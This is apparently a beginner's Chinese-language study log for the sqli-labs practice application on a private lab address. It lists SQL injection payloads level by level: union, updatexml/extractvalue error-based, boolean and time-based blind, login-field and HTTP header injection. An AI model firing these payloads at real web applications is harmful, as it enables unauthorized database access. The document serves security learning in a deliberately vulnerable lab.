**
**
小白开始重新学习sqli
单引号,字符串,错误注入,联合注入
http://172.16.13.33/sqli/Less-1/?id=1’ and 1=1–+
接着进行联合注入
整型,报错,联合注入
http://172.16.13.33/sqli/Less-2/?id=1 and 1=2 整型可以不用加注释
后进行联合注入
:
错误,单引号+括号,字符
http://172.16.13.33/sqli/Less-3/?id=1’) and 1=1–+
后进行联合查询套路
:
错误,双引号+括号,字符
http://172.16.13.33/sqli/Less-4/?id=1") and 1=1 --+
http://172.16.13.33/sqli/Less-4/?id=-1") union select 1,2,3–+
进行联合注入套路
二次注入,单引号,字符,报错注入
http://172.16.13.33/sqli/Less-5/?id=1’ and updatexml(1,concat(0x7e,database(),0x7e),1) --+
因为除了错误没有其他回显所以可以用报错注入
字符,双引号,二次注入
http://172.16.13.33/sqli/Less-6/?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1) --+
后用报错注入
字符,文件
单引号,布尔盲注
http://172.16.13.33/sqli/Less-8/?id=1’ and length(database())>7–+
http://172.16.13.33/sqli/Less-8/?id=1’ and substr(database(),1,1)=‘s’–+
进行布尔盲注
单引号,时间盲注
http://172.16.13.33/sqli/Less-9/?id=1’ and if(substr(database(),1,1)=‘s’,sleep(4),1) --+
加burpsuite进行盲注
双引号,时间盲注
http://172.16.13.33/sqli/Less-10/?id=1" and if(substr(database(),1,1)=‘s’,sleep(4),1) --+
错误,字符,单引号
admin’ and 1=1#
admin’ order by 5 #
后面用套路进行联合注入
错误,双引号+括号,字符
1" and 1=1 and 1"
前闭合,中间查询,后面报错,应该是这样没错了,实际测试没问题,可以回显,接下来就再concat()中构造查询语句:用错误查询
admin" and updatexml(1,concat(0x7e,database(),0x7e),1) and"
admin" and updatexml(1,concat(0x7e,length(database()),0x7e),1) and"
二次注入,单引号,字符
admin’) and 1=1–+
admin’) and updatexml(1,concat(0x7e,database(),0x7e),1)#
admin’) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1)#
后面用经典错误注入
二次注入,单引号,字符
admin" and 1=1#
admin" and updatexml(1,concat(0x7e,database(),0x7e),1)#
admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1)# #
后面用错误注入
1’ order by 6#
报错注入:1" and updatexml(1,concat(0x7e,database(),0x7e),1) #
时间盲注:
判断条件:1’ or sleep(5)#如果为时间盲注则延迟
admin’and if(substr(database(),1,1)=‘s’,sleep(5),1)#
admin’and if((substr((select database()),1,1)=‘s’),sleep(5),1)#
盲注
admin’ and substr(database(),1,1)=‘s’#
用布尔盲注
双引号+括号,时间/布尔盲注
admin") and 1=1#
admin") and length(database())>9#
字符,错误注入,单引号
报错型注入,单引号,注释符可用
admin’) and 1=1#
admin" and 1=1#
admin’ and extractvalue(1,concat(0x7e,database(),0x7e),1)#
admin’ and updatexml(1,concat(0x7e,database(),0x7e),1)–+
最终版:
name输入:admin
password输入:admin’ and updatexml(1,concat(0x7e,database(),0x7e),1)#
且注释一定用#
头部注入,错误
http头注入,当在User-Agent后面加上\时就会报错,是单引号闭合情况????、
头注入,错误,文件
还没做完,后面慢慢补。